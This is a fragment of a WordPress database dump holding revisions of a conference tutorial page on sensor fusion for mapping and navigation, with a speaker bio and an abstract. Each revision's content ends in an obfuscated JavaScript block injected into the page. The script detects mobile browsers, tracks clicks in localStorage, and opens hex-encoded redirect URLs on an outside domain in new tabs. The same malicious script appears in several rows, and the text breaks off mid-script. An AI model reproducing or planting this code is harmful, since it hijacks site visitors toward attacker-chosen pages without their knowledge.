_0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Sensor Fusion for Mapping and Navigation','','inherit','closed','closed','','4010-autosave-v1','','','2023-08-15 22:38:06','2023-08-15 22:38:06','',4010,'https://gsw2023.com/?p=5208',0,'revision','',0),
(5209,1,'2023-08-15 22:31:07','2023-08-15 22:31:07','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"4011\" img_size=\"1200x1000\"][vc_column_text]\r\n<h5><strong><span style=\"font-size: 10pt;\">Instructor</span></strong></h5>\r\n<h6><strong><span style=\"font-size: 10pt;\">Speaker: Dr. Mohamed M.R. Mostafa</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Duration: 1.5 hours</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Location: ISPRS GSW 2023 – Cairo</span></strong></h6>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"107\"][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span>\r\n<p style=\"text-align: justify;\">Dr. Mohamed M.R. Mostafa is the Lead Technical Authority, Mobile Mapping at Trimble Applanix. Dr.\r\nMostafa obtained his Ph.D. in geomatics engineering from The University of Calgary, Canada in 1999. He\r\nhas 24 years of experience in system design, development, integration, calibration, and quality control\r\nfor airborne, land, and indoor surveying and autonomy applications. He has managed and delivered\r\nprojects in the United States, Canada, Europe, Africa, and the Middle East and has contributed to more\r\nthan 250 technical publications, including the Manual of Photogrammetry 5th edition and the DEM User\r\nManual. He served at the ISPRS, ASPRS, and FIG in different capacities in the last 25 years. He received\r\n11 international awards in the last 30 years.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h1 class=\"fancy-title entry-title start-animation-done start-animation\">Sensor Fusion for Mapping and Navigation</h1>\r\n<h5><span style=\"text-align: justify;\"><strong>Tutorial Topic</strong></span></h5>\r\n<h5><strong>Abstract:</strong></h5>\r\n<p style=\"text-align: justify;\"><strong>Integrated Sensors enable both Surveying and Autonomy technologies. Self-driving vehicles R&amp;amp;D has</strong>\r\n<strong>been evolving over the past decade. Self-driving depends on several integrated technologies including</strong>\r\n<strong>high-definition mapping &amp;amp; map-based localization. The art and science of mapping along with national</strong>\r\n<strong>and international standards and specifications have resulted in adequate quality mapping products</strong>\r\n<strong>especially in the civilized part of the world for construction, infrastructure, and transportation networks</strong>\r\n<strong>but not satisfactory enough for more critical precision needed for autonomous driving. The developing</strong>\r\n<strong>part of the world lacks the existence of many mapping products let alone high-definition maps.</strong>\r\n<strong>Therefore, on one hand, the lack of high-definition maps might be an obstacle for self-driving vehicle</strong>\r\n<strong>development.</strong>\r\n<strong>On the other hand, sensor technology has significantly evolved in the past few decades. Including:</strong></p>\r\n<strong>. Multi-head cameras using oblique/nadir components</strong>\r\n<strong>. Outstanding LiDAR systems and radar sensors</strong>\r\n<strong>. The evolution of GPS into GNSS that integrated satellite positioning systems from around the</strong>\r\n<strong>globe</strong>\r\n<strong>. The evolution of inertial sensor technology due to their successful use in the automotive</strong>\r\n<strong>industry to trigger airbags and even their implementation in cellular phones that led to smaller,</strong>\r\n<strong>lighter weight, higher accuracy, and more economical Inertial measuring units IMU’s.</strong>\r\n<strong>Reaping the benefits of these evolving technologies to address the high-definition mapping challenges is</strong>\r\n<strong>the main scope of this proposed session. Designed to be informative, educational, and interactive, the</strong>\r\n<strong>workshop is designed to address the following Audience categories</strong>\r\n<strong>. Decision Makers</strong>\r\n<strong>. Technicians, Technologists, and Engineers</strong>\r\n<strong>. Students</strong>\r\n<strong>The workshop will start by addressing the ‘here and now’ technological challenges and their associated</strong>\r\n<strong>solutions as well as the future technological development plans to address that. First, the technological</strong>\r\n<strong>evolution of film into digital cameras, GPS into GNSS, laser profilers into LiDAR systems, INS into IMU,</strong>\r\n<strong>etc. will be addressed including the algorithmic evolution of aerotriangulation, SLAM, direct</strong>\r\n<strong>georeferencing (DG) and integrated sensor orientation (ISO). The benefits of integrating all the</strong>\r\n<strong>aforementioned technologies in the form of simultaneous adjustment and mapping (SAM). Then, it will</strong>\r\n<strong>address the integration mechanisms of imaging, LiDAR, radar, inertial and GNSS into not only</strong>\r\n<strong>georeferencing an image or LiDAR range but to also leveraging the precise LiDAR ranges and image</strong>\r\n<strong>pixels to improve the precision of the trajectory in post-processing and real time modes.</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Sensor Fusion for Mapping and Navigation','','inherit','closed','closed','','4010-revision-v1','','','2023-08-15 22:31:07','2023-08-15 22:31:07','',4010,'https://gsw2023.com/?p=5209',0,'revision','',0),
(5210,1,'2023-08-15 22:39:37','2023-08-15 22:39:37','[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"4011\" img_size=\"1200x1000\"][vc_column_text]\r\n<h5><strong><span style=\"font-size: 10pt;\">Instructor</span></strong></h5>\r\n<h6><strong><span style=\"font-size: 10pt;\">Speaker: Dr. Mohamed M.R. Mostafa</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Duration: 1.5 hours</span></strong></h6>\r\n<h6><strong><span style=\"font-size: 10pt;\">Location: ISPRS GSW 2023 – Cairo</span></strong></h6>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"107\"][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span>\r\n<p style=\"text-align: justify;\">Dr. Mohamed M.R. Mostafa is the Lead Technical Authority, Mobile Mapping at Trimble Applanix. Dr.\r\nMostafa obtained his Ph.D. in geomatics engineering from The University of Calgary, Canada in 1999. He\r\nhas 24 years of experience in system design, development, integration, calibration, and quality control\r\nfor airborne, land, and indoor surveying and autonomy applications. He has managed and delivered\r\nprojects in the United States, Canada, Europe, Africa, and the Middle East and has contributed to more\r\nthan 250 technical publications, including the Manual of Photogrammetry 5th edition and the DEM User\r\nManual. He served at the ISPRS, ASPRS, and FIG in different capacities in the last 25 years. He received\r\n11 international awards in the last 30 years.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text]\r\n<h1 class=\"fancy-title entry-title start-animation-done start-animation\">Sensor Fusion for Mapping and Navigation</h1>\r\n<h5><span style=\"text-align: justify;\"><strong>Tutorial Topic</strong></span></h5>\r\n<h5><strong>Abstract:</strong></h5>\r\n<p style=\"text-align: justify;\"><strong>Integrated Sensors enable both Surveying and Autonomy technologies. Self-driving vehicles R&amp;amp;D has been evolving over the past decade. Self-driving depends on several integrated technologies including high-definition mapping &amp;amp; map-based localization. The art and science of mapping along with national and international standards and specifications have resulted in adequate quality mapping products especially in the civilized part of the world for construction, infrastructure, and transportation networks but not satisfactory enough for more critical precision needed for autonomous driving. The developing part of the world lacks the existence of many mapping products let alone high-definition maps.\r\nTherefore, on one hand, the lack of high-definition maps might be an obstacle for self-driving vehicle development.\r\nOn the other hand, sensor technology has significantly evolved in the past few decades. Including:\r\n. Multi-head cameras using oblique/nadir components\r\n. Outstanding LiDAR systems and radar sensors\r\n. The evolution of GPS into GNSS that integrated satellite positioning systems from around the globe\r\n. The evolution of inertial sensor technology due to their successful use in the automotive industry to trigger airbags and even their implementation in cellular phones that led to smaller,lighter weight, higher accuracy, and more economical Inertial measuring units IMU’s.\r\nReaping the benefits of these evolving technologies to address the high-definition mapping challenges is the main scope of this proposed session. Designed to be informative, educational, and interactive, the workshop is designed to address the following Audience categories:\r\n. Decision Makers\r\n. Technicians, Technologists, and Engineers\r\n. Students\r\nThe workshop will start by addressing the ‘here and now’ technological challenges and their associated solutions as well as the future technological development plans to address that. First, the technological </strong><strong>evolution of film into digital cameras, GPS into GNSS, laser profilers into LiDAR systems, INS into IMU,</strong><strong>etc. will be addressed including the algorithmic evolution of aerotriangulation, SLAM, direct georeferencing (DG) and integrated sensor orientation (ISO). The benefits of integrating all the aforementioned technologies in the form of simultaneous adjustment and mapping (SAM). Then, it will address the integration mechanisms of imaging, LiDAR, radar, inertial and GNSS into not onlygeoreferencing an image or LiDAR range but to also leveraging the precise LiDAR ranges and image pixels to improve the precision of the trajectory in post-processing and real time modes.</strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 